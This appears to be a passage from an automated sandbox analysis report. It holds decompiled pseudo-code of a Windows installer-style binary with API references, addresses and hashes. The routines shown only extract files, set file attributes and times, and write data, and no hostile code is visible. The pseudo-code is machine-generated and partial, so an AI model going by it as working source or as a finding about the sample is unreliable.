                                                                                                                                                                                                          						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                          						_t30 = E00864C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E00864B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                          						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                          						__eflags = _t50;
                                                                                                                                                                                                          						if(_t50 != 0) {
                                                                                                                                                                                                          							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                          							__eflags = _t51;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t51 = 0x80;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t33 = 1;
                                                                                                                                                                                                          							goto L35;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t30 = _t44 - 1;
                                                                                                                                                                                                          					__eflags = _t30;
                                                                                                                                                                                                          					if(_t30 == 0) {
                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a4 == 3) {
                                                                                                                                                                                                          					_t30 = E00864B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L3;
                                                                                                                                                                                                          			}































                                                                                                                                                                                                          0x00864cd0
                                                                                                                                                                                                          0x00864cdb
                                                                                                                                                                                                          0x00864ce0
                                                                                                                                                                                                          0x00864ce2
                                                                                                                                                                                                          0x00864cee
                                                                                                                                                                                                          0x00864cf2
                                                                                                                                                                                                          0x00864d0e
                                                                                                                                                                                                          0x00864d0e
                                                                                                                                                                                                          0x00864d11
                                                                                                                                                                                                          0x00864e83
                                                                                                                                                                                                          0x00864e88
                                                                                                                                                                                                          0x00864e98
                                                                                                                                                                                                          0x00864e98
                                                                                                                                                                                                          0x00864d17
                                                                                                                                                                                                          0x00864d17
                                                                                                                                                                                                          0x00864d1a
                                                                                                                                                                                                          0x00864d2f
                                                                                                                                                                                                          0x00864d2f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d2f
                                                                                                                                                                                                          0x00864d1c
                                                                                                                                                                                                          0x00864d1c
                                                                                                                                                                                                          0x00864d1f
                                                                                                                                                                                                          0x00864dcb
                                                                                                                                                                                                          0x00864dd0
                                                                                                                                                                                                          0x00864dd2
                                                                                                                                                                                                          0x00864ddd
                                                                                                                                                                                                          0x00864ddd
                                                                                                                                                                                                          0x00864de3
                                                                                                                                                                                                          0x00864de8
                                                                                                                                                                                                          0x00864ded
                                                                                                                                                                                                          0x00864ded
                                                                                                                                                                                                          0x00864def
                                                                                                                                                                                                          0x00864df0
                                                                                                                                                                                                          0x00864df0
                                                                                                                                                                                                          0x00864df4
                                                                                                                                                                                                          0x00864df4
                                                                                                                                                                                                          0x00864df6
                                                                                                                                                                                                          0x00864df9
                                                                                                                                                                                                          0x00864dfc
                                                                                                                                                                                                          0x00864dfc
                                                                                                                                                                                                          0x00864dfe
                                                                                                                                                                                                          0x00864dff
                                                                                                                                                                                                          0x00864dff
                                                                                                                                                                                                          0x00864e03
                                                                                                                                                                                                          0x00864e08
                                                                                                                                                                                                          0x00864e0a
                                                                                                                                                                                                          0x00864e0f
                                                                                                                                                                                                          0x00864d03
                                                                                                                                                                                                          0x00864d03
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d03
                                                                                                                                                                                                          0x00864e18
                                                                                                                                                                                                          0x00864e20
                                                                                                                                                                                                          0x00864e25
                                                                                                                                                                                                          0x00864e27
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e33
                                                                                                                                                                                                          0x00864e38
                                                                                                                                                                                                          0x00864e3a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e40
                                                                                                                                                                                                          0x00864e51
                                                                                                                                                                                                          0x00864e56
                                                                                                                                                                                                          0x00864e5b
                                                                                                                                                                                                          0x00864e5e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e6a
                                                                                                                                                                                                          0x00864e6f
                                                                                                                                                                                                          0x00864e71
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e77
                                                                                                                                                                                                          0x00864e7d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e7d
                                                                                                                                                                                                          0x00864d25
                                                                                                                                                                                                          0x00864d25
                                                                                                                                                                                                          0x00864d28
                                                                                                                                                                                                          0x00864d36
                                                                                                                                                                                                          0x00864d3b
                                                                                                                                                                                                          0x00864d40
                                                                                                                                                                                                          0x00864d40
                                                                                                                                                                                                          0x00864d42
                                                                                                                                                                                                          0x00864d43
                                                                                                                                                                                                          0x00864d43
                                                                                                                                                                                                          0x00864d47
                                                                                                                                                                                                          0x00864d4a
                                                                                                                                                                                                          0x00864d4a
                                                                                                                                                                                                          0x00864d4c
                                                                                                                                                                                                          0x00864d4f
                                                                                                                                                                                                          0x00864d4f
                                                                                                                                                                                                          0x00864d51
                                                                                                                                                                                                          0x00864d52
                                                                                                                                                                                                          0x00864d52
                                                                                                                                                                                                          0x00864d56
                                                                                                                                                                                                          0x00864d5b
                                                                                                                                                                                                          0x00864d5d
                                                                                                                                                                                                          0x00864d62
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d67
                                                                                                                                                                                                          0x00864d6f
                                                                                                                                                                                                          0x00864d74
                                                                                                                                                                                                          0x00864d76
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d7c
                                                                                                                                                                                                          0x00864d84
                                                                                                                                                                                                          0x00864d89
                                                                                                                                                                                                          0x00864d8b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d94
                                                                                                                                                                                                          0x00864d99
                                                                                                                                                                                                          0x00864d9e
                                                                                                                                                                                                          0x00864da1
                                                                                                                                                                                                          0x00864daa
                                                                                                                                                                                                          0x00864daa
                                                                                                                                                                                                          0x00864da3
                                                                                                                                                                                                          0x00864da3
                                                                                                                                                                                                          0x00864da3
                                                                                                                                                                                                          0x00864db5
                                                                                                                                                                                                          0x00864dbb
                                                                                                                                                                                                          0x00864dbd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864dc3
                                                                                                                                                                                                          0x00864dc5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864dc5
                                                                                                                                                                                                          0x00864dbd
                                                                                                                                                                                                          0x00864d2a
                                                                                                                                                                                                          0x00864d2a
                                                                                                                                                                                                          0x00864d2d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d2d
                                                                                                                                                                                                          0x00864cf8
                                                                                                                                                                                                          0x00864cfd
                                                                                                                                                                                                          0x00864d02
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00864DB5
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00864DDD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFileItemText
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 3625706803-2312194364
                                                                                                                                                                                                          • Opcode ID: 98607b36fe3a9808a1709c7d77dc3e2ba59b4d0063c817711d1b6d00c7010c44
                                                                                                                                                                                                          • Instruction ID: 22769ecb6bf5fae12762fbadfd885e95879bf70f343e22c2994e5eaa89e02ea8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98607b36fe3a9808a1709c7d77dc3e2ba59b4d0063c817711d1b6d00c7010c44
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D415936A001058BCB259F38DD44AFD73A5FB46710F166668D882D7682DF32DE4AC750
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00864C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                          				struct _FILETIME _v12;
                                                                                                                                                                                                          				struct _FILETIME _v20;
                                                                                                                                                                                                          				FILETIME* _t14;
                                                                                                                                                                                                          				int _t15;
                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t21 = __ecx * 0x18;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t21 + 0x868d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t14 =  &_v12;
                                                                                                                                                                                                          					_t15 = SetFileTime( *(_t21 + 0x868d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          0x00864c40
                                                                                                                                                                                                          0x00864c4a
                                                                                                                                                                                                          0x00864c8d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864c70
                                                                                                                                                                                                          0x00864c70
                                                                                                                                                                                                          0x00864c7e
                                                                                                                                                                                                          0x00864c86
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864c8a

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DosDateTimeToFileTime.KERNEL32 ref: 00864C54
                                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00864C66
                                                                                                                                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00864C7E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$File$DateLocal
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2071732420-0
                                                                                                                                                                                                          • Opcode ID: 5235b526bb0ac2816d1b3277e84ffdd5a8fa71e8b8eceb5e7a2628f5d6b50907
                                                                                                                                                                                                          • Instruction ID: 19da8557ee60edb34baeda90510247d188ac68b3d9b80f214c337ccb64714102
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5235b526bb0ac2816d1b3277e84ffdd5a8fa71e8b8eceb5e7a2628f5d6b50907
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62F0907260120CAFDB24DFB4CC48DBF7BACFB04240B46152BE916D2150EA74D914CBB1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E0086487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                          				CHAR* _t11;
                                                                                                                                                                                                          				long _t18;
                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t11 = __ecx;
                                                                                                                                                                                                          				asm("sbb edi, edi");
                                                                                                                                                                                                          				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                          				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                          					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                          						asm("sbb esi, esi");
                                                                                                                                                                                                          						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t23 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                          				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                          					return _t7;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E0086490C(_t11);
                                                                                                                                                                                                          					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          0x00864880
                                                                                                                                                                                                          0x0086488c
                                                                                                                                                                                                          0x00864894
                                                                                                                                                                                                          0x008648a0
                                                                                                                                                                                                          0x008648c9
                                                                                                                                                                                                          0x008648ce
                                                                                                                                                                                                          0x008648a2
                                                                                                                                                                                                          0x008648a8
                                                                                                                                                                                                          0x008648b7
                                                                                                                                                                                                          0x008648bc
                                                                                                                                                                                                          0x008648aa
                                                                                                                                                                                                          0x008648ac
                                                                                                                                                                                                          0x008648ac
                                                                                                                                                                                                          0x008648a8
                                                                                                                                                                                                          0x008648de
                                                                                                                                                                                                          0x008648e7
                                                                                                                                                                                                          0x0086490b
                                                                                                                                                                                                          0x008648ee
                                                                                                                                                                                                          0x008648f0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864902

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00864A23,?,00864F67,*MEMCAB,00008000,00000180), ref: 008648DE
                                                                                                                                                                                                          • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00864F67,*MEMCAB,00008000,00000180), ref: 00864902
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 2e6327df9ecb71321cc68988ecf675ea3d1c3e1821ee3adffa3d320c7e20bbb5
                                                                                                                                                                                                          • Instruction ID: 8d3fb73430f976bde3c8cdf3bf316b24f64389a441c08ee1416c98691f840351
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e6327df9ecb71321cc68988ecf675ea3d1c3e1821ee3adffa3d320c7e20bbb5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78016DA3E1157426F32841294C88FBB591CEBD6B34F1B2334FDEAE71D2D5644C0482E0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E00864AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				struct HWND__* _t21;
                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t20 =  *0x86858c; // 0x274
                                                                                                                                                                                                          				_t9 = E00863680(_t20);
                                                                                                                                                                                                          				if( *0x8691d8 == 0) {
                                                                                                                                                                                                          					_push(_t24);
                                                                                                                                                                                                          					_t12 = WriteFile( *(0x868d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                          					if(_t12 != 0) {
                                                                                                                                                                                                          						_t25 = _a12;
                                                                                                                                                                                                          						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                          							_t14 =  *0x869400; // 0x89475
                                                                                                                                                                                                          							_t15 = _t14 + _t25;
                                                                                                                                                                                                          							 *0x869400 = _t15;
                                                                                                                                                                                                          							if( *0x868184 != 0) {
                                                                                                                                                                                                          								_t21 =  *0x868584; // 0x0
                                                                                                                                                                                                          								if(_t21 != 0) {
                                                                                                                                                                                                          									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x8693f8, 0);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t25;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t9 | 0xffffffff;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          0x00864ad5
                                                                                                                                                                                                          0x00864adb
                                                                                                                                                                                                          0x00864ae7
                                                                                                                                                                                                          0x00864aee
                                                                                                                                                                                                          0x00864b05
                                                                                                                                                                                                          0x00864b0d
                                                                                                                                                                                                          0x00864b14
                                                                                                                                                                                                          0x00864b1a
                                                                                                                                                                                                          0x00864b1c
                                                                                                                                                                                                          0x00864b21
                                                                                                                                                                                                          0x00864b2a
                                                                                                                                                                                                          0x00864b2f
                                                                                                                                                                                                          0x00864b31
                                                                                                                                                                                                          0x00864b39
                                                                                                                                                                                                          0x00864b54
                                                                                                                                                                                                          0x00864b54
                                                                                                                                                                                                          0x00864b39
                                                                                                                                                                                                          0x00864b2f
                                                                                                                                                                                                          0x00864b0f
                                                                                                                                                                                                          0x00864b0f
                                                                                                                                                                                                          0x00864b0f
                                                                                                                                                                                                          0x00864b5e
                                                                                                                                                                                                          0x00864ae9
                                                                                                                                                                                                          0x00864aed
                                                                                                                                                                                                          0x00864aed

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00863680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0086369F
                                                                                                                                                                                                            • Part of subcall function 00863680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636B2
                                                                                                                                                                                                            • Part of subcall function 00863680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636DA
                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00864B05
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1084409-0
                                                                                                                                                                                                          • Opcode ID: b655c3868383783b98035234ba7cd5859a60c20a47deac80055a4e9e798d9cf3
                                                                                                                                                                                                          • Instruction ID: bee5f29e885050f6f1aacb998b1ae4d0fb2b2d232416029d0dfd5510cc2c8e9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b655c3868383783b98035234ba7cd5859a60c20a47deac80055a4e9e798d9cf3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA019271200215EBD7198F98DC05BAA775DF744735F16A225F939DB2E0CBB0D811CB50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0086658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                          				char* _t6;
                                                                                                                                                                                                          				char* _t8;
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				char* _t16;
                                                                                                                                                                                                          				intOrPtr* _t17;
                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                          				char* _t19;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t16 = __ecx;
                                                                                                                                                                                                          				_t10 = __edx;
                                                                                                                                                                                                          				_t17 = __ecx;
                                                                                                                                                                                                          				_t1 = _t17 + 1; // 0x868b3f
                                                                                                                                                                                                          				_t12 = _t1;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					_t4 =  *_t17;
                                                                                                                                                                                                          					_t17 = _t17 + 1;
                                                                                                                                                                                                          				} while (_t4 != 0);
                                                                                                                                                                                                          				_t18 = _t17 - _t12;
                                                                                                                                                                                                          				_t2 = _t18 + 1; // 0x868b40
                                                                                                                                                                                                          				if(_t2 < __edx) {
                                                                                                                                                                                                          					_t19 = _t18 + __ecx;
                                                                                                                                                                                                          					if(_t19 > __ecx) {
                                                                                                                                                                                                          						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                          						if( *_t8 != 0x5c) {
                                                                                                                                                                                                          							 *_t19 = 0x5c;
                                                                                                                                                                                                          							_t19 =  &(_t19[1]);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t6 = _a4;
                                                                                                                                                                                                          					 *_t19 = 0;
                                                                                                                                                                                                          					while( *_t6 == 0x20) {
                                                                                                                                                                                                          						_t6 = _t6 + 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return E008616B3(_t16, _t10, _t6);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0x8007007a;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          0x00866592
                                                                                                                                                                                                          0x00866594
                                                                                                                                                                                                          0x00866596
                                                                                                                                                                                                          0x00866598
                                                                                                                                                                                                          0x00866598
                                                                                                                                                                                                          0x0086659b
                                                                                                                                                                                                          0x0086659b
                                                                                                                                                                                                          0x0086659d
                                                                                                                                                                                                          0x0086659e
                                                                                                                                                                                                          0x008665a2
                                                                                                                                                                                                          0x008665a4
                                                                                                                                                                                                          0x008665a9
                                                                                                                                                                                                          0x008665b2
                                                                                                                                                                                                          0x008665b6
                                                                                                                                                                                                          0x008665ba
                                                                                                                                                                                                          0x008665c3
                                                                                                                                                                                                          0x008665c5
                                                                                                                                                                                                          0x008665c8
                                                                                                                                                                                                          0x008665c8
                                                                                                                                                                                                          0x008665c3
                                                                                                                                                                                                          0x008665c9
                                                                                                                                                                                                          0x008665cc
                                                                                                                                                                                                          0x008665d2
                                                                                                                                                                                                          0x008665d1
                                                                                                                                                                                                          0x008665d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008665dc
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharPrevA.USER32(00868B3E,00868B3F,00000001,00868B3E,-00000003,?,008660EC,00861140,?), ref: 008665BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrev
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 122130370-0
                                                                                                                                                                                                          • Opcode ID: 036619c51bbae4b118d7c10c0190bd30f63a0ec528f7d157b467c2554b852f5f
                                                                                                                                                                                                          • Instruction ID: 940ee27e042bd1e56af9c0dcf4fa49704de3ab965b70835f30f7145e701e7ed5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 036619c51bbae4b118d7c10c0190bd30f63a0ec528f7d157b467c2554b852f5f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF04C326042D09BD731491DD88DB76BFDEFB86350F2A016EE8DBC3205EA658C5583A4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E0086621E() {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				signed int _t5;
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          					0x4f0 = 2;
                                                                                                                                                                                                          					_t9 = E0086597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E008644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					_t9 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          0x00866229
                                                                                                                                                                                                          0x00866230
                                                                                                                                                                                                          0x00866247
                                                                                                                                                                                                          0x0086626a
                                                                                                                                                                                                          0x00866272
                                                                                                                                                                                                          0x00866249
                                                                                                                                                                                                          0x00866255
                                                                                                                                                                                                          0x0086625f
                                                                                                                                                                                                          0x00866264
                                                                                                                                                                                                          0x00866264
                                                                                                                                                                                                          0x00866284

                                                                                                                                                                                                          APIs
